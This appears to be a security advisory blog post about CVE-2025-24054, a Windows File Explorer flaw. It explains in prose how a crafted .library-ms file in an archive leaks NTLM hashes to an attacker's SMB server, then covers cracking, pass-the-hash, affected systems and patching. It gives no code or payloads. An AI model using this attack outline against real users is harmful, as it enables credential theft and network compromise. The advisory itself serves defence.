Heads up for all Windows users and IT administrators: a significant vulnerability in Windows File Explorer is being actively exploited by attackers. This vulnerability, now tracked as CVE-2025-24054, was initially assigned the identifier CVE-2025-24071.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added this flaw to its Known Exploited Vulnerabilities (KEV) catalog, signaling that it is a clear and present danger.
Here’s what you need to know to protect yourself.
What is CVE-2025-24054?
CVE-2025-24054 is a high-impact spoofing and sensitive information disclosure vulnerability in Windows File Explorer. It allows an attacker to steal a user’s NTLM hash, which is a hashed version of their Windows password.
The vulnerability is particularly dangerous because it requires very little user interaction—no clicking on strange executables or ignoring security warnings. The simple act of extracting a malicious ZIP or RAR archive is enough to trigger the exploit.
How Does the Attack Work?
The attack chain is both clever and alarming:
- Delivery: An attacker sends a user a seemingly harmless archive file (like a
.zipor.rar) via a phishing email or a malicious download. - The Bait: Inside this archive is a specially crafted file with a
.library-msextension. These are normally benign Windows Library files. - The Trap: This malicious
.library-msfile contains a path pointing to an SMB server controlled by the attacker. - The Exploit: When the user extracts the archive, the Windows File Explorer’s preview or indexing mechanism automatically parses the
.library-msfile to gather information. This action, which happens in the background without the user even opening the file, causes the system to automatically try to authenticate with the attacker’s SMB server. - Theft: This authentication attempt sends the user’s NTLMv2 hash directly to the attacker.
What’s the Impact of a Stolen NTLM Hash?
An NTLM hash is not the user’s plaintext password, but it’s the next best thing for an attacker. With this hash, an attacker can:
- Offline Cracking: Use powerful computers to “crack” the hash and discover the original plaintext password.
- Pass-the-Hash (PtH) Attacks: In many network environments, an attacker can use the hash itself (without ever knowing the password) to impersonate the user and move laterally through a network, accessing other machines and servers.
This makes the vulnerability a critical entry point for wider network compromise.
Who is Affected?
This vulnerability affects a wide range of Microsoft products, including:
- Windows 10 (various versions)
- Windows 11 (various versions)
- Windows Server 2016, 2019, and 2022
Given the broad range of affected systems, it is safe to assume all modern Windows clients and servers are at risk until patched.
How to Protect Yourself: Patch Immediately
The solution is straightforward and urgent: Apply the security updates released by Microsoft during the March 2025 Patch Tuesday.
Microsoft has addressed this vulnerability, and installing the latest Windows updates is the only way to fully mitigate the threat.
Due to its inclusion in the CISA KEV catalog, this is not a patch to be delayed. Attackers are actively using this exploit, and any unpatched system is a target.
Steps to Take:
- Prioritize Patching: Use Windows Update or your organization’s patch management system to deploy the March 2025 (or later) security updates immediately.
- Educate Users: Remind users to be extremely cautious of unsolicited ZIP or RAR attachments, even if they appear to come from a known source.
- Monitor for Suspicious Activity: Security teams should monitor for unusual outbound SMB traffic (TCP port 445) from workstations, as this could be a sign of an attempted exploit.
Don’t wait for a compromise. The threat is active, and the solution is available. Patch your systems now.
